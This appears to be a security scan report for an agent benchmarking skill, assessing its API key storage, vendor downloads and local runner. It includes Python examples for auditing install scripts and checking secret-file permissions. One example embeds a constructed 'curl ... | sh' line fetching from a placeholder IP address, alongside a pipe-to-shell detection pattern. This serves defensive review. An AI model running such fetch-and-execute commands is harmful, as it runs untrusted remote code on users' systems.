Skill v2.20.0

ClawScan security

Botmark Skill · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Mar 22, 2026, 6:06 AM
Verdict
Benign
Confidence
medium
Model
gpt-5-mini
Summary
The skill's requirements and instructions are coherent with a benchmarking integration: it needs a BotMark API key, uses curl and python3 to call the service and run a local runner, and persists the key for future runs. Nothing in the package appears unrelated to its stated purpose, but it does write configuration and execute local code, so proceed only if you trust botmark.cc.
Guidance
This skill is internally consistent with its described benchmarking purpose, but it will (a) send your agent profile and owner-supplied text to botmark.cc, (b) persist your BOTMARK_API_KEY into openclaw.json and/or skills/botmark-skill/.botmark_env, and (c) execute a bundled Python runner that performs network calls. Only install if you trust botmark.cc and are comfortable storing the API key on disk. If you have concerns: inspect botmark_engine.py and setup.sh before running, run the skill in an isolated environment, or start with a test API key (one carrying the bm_test_ prefix) rather than a production key. Also confirm whether any feedback or 'owner messages' are published publicly (the docs are inconsistent on this point) before sending sensitive content in those fields.

Review Dimensions

Purpose & Capability
ok · The name and description (agent self-evaluation) are consistent with the required items: BOTMARK_API_KEY, python3, curl, and an engine script. The required binaries and environment variables are appropriate for making authenticated API calls and running the cached runner.
Instruction Scope
note · SKILL.md instructs the agent to call BotMark endpoints, save session_config and runner_script, run botmark_engine.py, and persist an API key to openclaw.json or skills/botmark-skill/.botmark_env. These actions are within the stated benchmark workflow, but they include persistent storage of a secret and execution of a local script that performs network I/O. SKILL.md also requires owner-supplied free-text fields (talktoowner, work_and_challenges); their purpose is reasonably explained, but they can carry sensitive information.
Install Mechanism
ok · There is no registry install spec (instruction-only install), but a setup.sh is provided which may download files from https://botmark.cc and write them into the OpenClaw workspace. The download source is the vendor domain (not a URL shortener or a bare IP address); no obscure third-party hosts are used.
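The host check described above, as an added example in Python (not the scanner's or the skill's own code): it pulls every URL out of an install script, accepts only hosts under the vendor domain named in the report, flags raw IP addresses, URL shorteners and other third-party hosts, and also flags plain http:// fetches and "curl ... | sh" pipelines that would run remote code unseen. The two setup scripts it is run over are constructed samples, not the real setup.sh, and the shortener list is illustrative.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Vendor domain from the report; the only download source the audit accepts.
VENDOR_DOMAIN = "botmark.cc"

# Illustrative shortener list (assumption, not taken from the report).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
# "curl/wget ... | sh" or "| bash" (optionally via sudo): remote code executed unseen.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash)\b")


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_install_script(script_text: str, vendor: str = VENDOR_DOMAIN) -> dict:
    """Classify every download URL in a setup script and flag risky fetch patterns."""
    urls = URL_RE.findall(script_text)
    allowed, flagged = [], []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if host == vendor or host.endswith("." + vendor):
            allowed.append(url)
        elif _is_ip(host):
            flagged.append((url, "raw IP address"))
        elif host in SHORTENERS:
            flagged.append((url, "URL shortener"))
        else:
            flagged.append((url, "third-party host"))
    return {
        "allowed": allowed,
        "flagged": flagged,
        "plain_http": [u for u in urls if u.startswith("http://")],
        "pipe_to_shell": [m.group(0) for m in PIPE_TO_SHELL_RE.finditer(script_text)],
    }


def is_clean(report: dict) -> bool:
    """True when every fetch is HTTPS from the vendor and nothing is piped to a shell."""
    return not (report["flagged"] or report["plain_http"] or report["pipe_to_shell"])


# Constructed sample resembling what the report describes: vendor-only HTTPS downloads.
SAMPLE_SETUP_SH = """#!/bin/sh
# constructed sample, not the real setup.sh
curl -fsSL https://botmark.cc/skill/botmark_engine.py -o botmark_engine.py
curl -fsSL https://botmark.cc/skill/session_config.json -o session_config.json
chmod 600 .botmark_env
"""

# Constructed variant with the patterns a reviewer would want flagged.
SAMPLE_BAD_SETUP_SH = SAMPLE_SETUP_SH + """curl -fsSL http://203.0.113.5/helper.sh | sh
wget https://bit.ly/abc123 -O extra.py
"""

if __name__ == "__main__":
    for name, text in (("clean", SAMPLE_SETUP_SH), ("risky", SAMPLE_BAD_SETUP_SH)):
        report = audit_install_script(text)
        print(name, "clean" if is_clean(report) else "REVIEW", report["flagged"], report["pipe_to_shell"])
```

Run it against the downloaded setup.sh (`audit_install_script(open("setup.sh").read())`) before executing the script; a non-empty `flagged` or `pipe_to_shell` list is the cue to read those lines by hand.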
Credentials
note · Only BOTMARK_API_KEY is required as the primary credential; the optional BOTMARK_BINDING_ID and BOTMARK_SERVER_URL are explained. Requesting an API key and owner-provided profile text is proportionate to producing personalized reports, but note that the skill stores the API key persistently (in openclaw.json and/or .botmark_env), which increases the impact if the key is compromised.
Persistence & Privilege
note · always: false (no forced global presence). The setup script writes the API key into OpenClaw's openclaw.json and creates a .botmark_env file in the skill directory (chmod 600). This is expected for convenience, but it modifies the platform config file and creates persistent secret storage; users should be aware of and approve this behavior.
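A post-install check for the secret storage described above, as an added example in Python (not the scanner's or the skill's own code): it confirms that .botmark_env exists with mode 0600, that it holds BOTMARK_API_KEY, whether that key is a bm_test_ test key, and whether openclaw.json also carries the key. The paths, the key name and the test-key prefix come from the report; the .botmark_env KEY=VALUE layout and the nesting inside openclaw.json are assumptions, which is why the JSON search is recursive rather than tied to one field path. The demo builds a constructed workspace in a temporary directory.

```python
import json
import os
import stat
import tempfile
from pathlib import Path

ENV_FILE = Path("skills/botmark-skill/.botmark_env")  # path named in the report
CONFIG_FILE = Path("openclaw.json")                   # platform config named in the report
KEY_NAME = "BOTMARK_API_KEY"
TEST_KEY_PREFIX = "bm_test_"                          # test-key prefix named in the report


def _parse_env(text: str) -> dict:
    """Minimal KEY=VALUE parser; the exact .botmark_env layout is an assumption."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        values[key.strip()] = value.strip().strip("'\"")
    return values


def _contains_key(obj, name: str) -> bool:
    """Recursively look for a field called `name` anywhere in parsed JSON."""
    if isinstance(obj, dict):
        return any(k == name or _contains_key(v, name) for k, v in obj.items())
    if isinstance(obj, list):
        return any(_contains_key(v, name) for v in obj)
    return False


def check_secret_storage(workspace: Path) -> dict:
    """Report where the API key is persisted and whether the env file is private."""
    findings = {"env_file_present": False, "env_mode_ok": False,
                "key_in_env": False, "test_key": False, "key_in_config": False}
    env_path = workspace / ENV_FILE
    if env_path.exists():
        findings["env_file_present"] = True
        mode = stat.S_IMODE(env_path.stat().st_mode)
        findings["env_mode_ok"] = mode == 0o600        # chmod 600 per the report
        key = _parse_env(env_path.read_text()).get(KEY_NAME, "")
        findings["key_in_env"] = bool(key)
        findings["test_key"] = key.startswith(TEST_KEY_PREFIX)
    cfg_path = workspace / CONFIG_FILE
    if cfg_path.exists():
        findings["key_in_config"] = _contains_key(json.loads(cfg_path.read_text()), KEY_NAME)
    return findings


def demo() -> dict:
    """Constructed workspace mimicking what setup.sh is described as writing."""
    root = Path(tempfile.mkdtemp())
    env_path = root / ENV_FILE
    env_path.parent.mkdir(parents=True)
    env_path.write_text(f"{KEY_NAME}=bm_test_0123456789\n")   # constructed test key
    os.chmod(env_path, 0o644)            # deliberately too permissive: world-readable
    config = {"skills": {"botmark-skill": {"env": {KEY_NAME: "bm_test_0123456789"}}}}
    (root / CONFIG_FILE).write_text(json.dumps(config))        # assumed nesting
    before = check_secret_storage(root)
    os.chmod(env_path, 0o600)            # the mode the report says setup.sh applies
    after = check_secret_storage(root)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Point `check_secret_storage` at the real OpenClaw workspace after running setup.sh: `env_mode_ok` false means the file is readable by other local users, and `key_in_config` true means the key also lives in openclaw.json, so revoking or rotating it must cover both locations.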